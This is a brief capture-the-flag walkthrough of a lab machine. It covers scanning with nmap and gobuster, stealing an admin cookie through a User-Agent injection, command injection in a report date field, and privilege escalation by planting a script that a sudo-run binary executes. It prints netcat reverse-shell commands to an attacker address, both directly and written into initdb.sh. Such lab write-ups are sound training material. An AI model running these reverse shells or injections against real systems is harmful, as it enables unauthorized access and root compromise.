Ping
Nmap Scans
mapit 10.10.11.8
Nmap Default Scan
Nmap Script and Service Scan
Nmap All Port Scan
Gobuster Scan
gobuster dir -u http://10.10.11.8:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,aspx -s 200,204,301,302,307,403 -k --status-codes "" -o gobustet.txt
Tried to steal cookies
So I have Added the payload in user agent as well
then Forwarded and got some cookie
I can see that in my web server
Will use this cookie and try to authenticate as legitimate user
Decode base64 hash
Normally I can’t access the dashboard
But now we can use the cookie to authenticate
I have changed the new cookie
Will forward and see, it worked…!
is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Got admin’s dashboard, also changed admin cookies via developer tool, So I won’t last admin’s dashboard.
Will Jump to Initial Foothold…!
I have generated the report, nothing happened
Will inject something in date filed
whoami
Will get a reverse shell
nc -e /bin/sh 10.10.14.3 4444
Got it…!
User.txt
Will Jump to Privilege Escalation…!
Our Privilege
sudo -l
Will check that
sudo /usr/bin/syscheck
Will read the binary
we can edit initdb.sh
Will add reverse shell script
echo "nc -e /bin/sh 10.10.14.3 1234" > ./initdb.sh
Change permissions
chmod +x initdb.sh
Will run the binary now
sudo /usr/bin/syscheck
Got shell as root…!
Root.txt
